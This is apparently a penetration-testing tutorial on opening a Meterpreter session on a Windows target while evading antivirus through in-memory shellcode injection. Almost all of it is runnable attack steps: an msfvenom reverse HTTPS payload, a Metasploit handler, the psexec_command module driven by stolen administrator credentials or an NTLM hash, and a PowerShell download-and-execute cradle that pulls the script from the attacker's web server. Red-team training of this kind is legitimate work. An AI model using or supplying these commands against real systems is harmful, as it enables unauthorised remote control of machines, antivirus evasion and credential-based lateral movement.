In this tutorial I will walk through how to create a Meterpreter session that will bypass antivirus while not touching the disk and injecting directly into memory. This method is useful when the normal psexec exploit module fails.
First there are a couple assumptions to start with:
- You can communicate with the target and the target can communicate with you.
- You have already obtained administrator level credentials or a hash by other means.
- Copy Invoke-Shellcode.ps1 to a local directory.
root@Oak:~/PowerSploit# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
- Create the payload using msfvenom and append the output to Invoke-Shellcode.ps1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.38 LPORT=8443 EXITFUNC=thread -f ps1 >> Invoke-Shellcode.ps1
- Start Metasploit
- Configure a handler to receive our reverse https connection (Tip: useful for IPS evasion)
# Select the handler use exploit/multi/handler # Set the payload. This must match what was set in msfvenom set payload windows/x64/meterpreter/reverse_https set lport 8443 set lhost 0.0.0.0 set exitfunc thread # To receive multiple meterpreter sessions set ExitOnSession false set ExitOnSession false # Run as a job run -j
- To execute the Powershell script, we will use psexec_command auxiliary module
- To both load the PowerShell script and execute it in one command, we call it after the semicolon.
#Ensure to properly escape the single quotes in the PowerShell command set command powershell.exe -exec bypass -Command IEX (New-Object system.Net.WebClient).DownloadString(\'http://10.0.2.38/Invoke-Shellcode.ps1\');Invoke-Shellcode -Shellcode @($buf) -Force set rhosts targetip set smbuser targetusername #The smbpass option can either be a password or an NTLM hash. set smbpass hash #This is optional, but I've had success with cleanup using the delay option. set delay 20
- Run a simple http webserver (Tip: this is handy to immediately see that the target was able to access the PowerShell script.)
- cd to the directory where the PowerShell script is located
- Start the python webserver
python -m SimpleHTTPServer 80
- Run the exploit.
- If all goes as planned a Meterpreter session will be opened.